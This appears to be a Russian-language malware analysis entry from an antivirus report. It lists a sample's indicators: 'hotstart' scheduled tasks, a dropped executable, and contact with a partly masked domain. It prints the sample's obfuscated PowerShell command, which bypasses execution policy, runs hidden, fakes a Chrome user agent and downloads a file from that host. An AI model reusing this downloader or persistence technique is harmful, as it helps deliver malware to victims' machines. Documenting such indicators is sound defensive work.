Техническая информация
- <SYSTEM32>\tasks\hotstart
- <SYSTEM32>\tasks\microsoft\windows\windows media sharing\hotstart
- '%LOCALAPPDATA%\tempuei47.exe'
- %LOCALAPPDATA%\tempuei47.exe
- <SYSTEM32>\tasks\hotstart
- 'go##ien.com':80
- DNS ASK go##ien.com
- '<SYSTEM32>\cmd.exe' /c pO^wErshEll -executionpolicy bypass -noprofile -w hidden $v1='Net.We'; $v2='bClient'; $var = (New-Object $v1$v2); $var.Headers['User-Agent'] = 'Google Chrome'; $var.downloadfile('http://go##...' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c pO^wErshEll -executionpolicy bypass -noprofile -w hidden $v1='Net.We'; $v2='bClient'; $var = (New-Object $v1$v2); $var.Headers['User-Agent'] = 'Google Chrome'; $var.downloadfile('http://go##...
- '<SYSTEM32>\taskeng.exe' {4EBBD345-2033-4D4F-A0F0-7BE58130CD2E} S-1-5-21-1960123792-2022915161-3775307078-1001:eqwouu\user:Interactive:[1]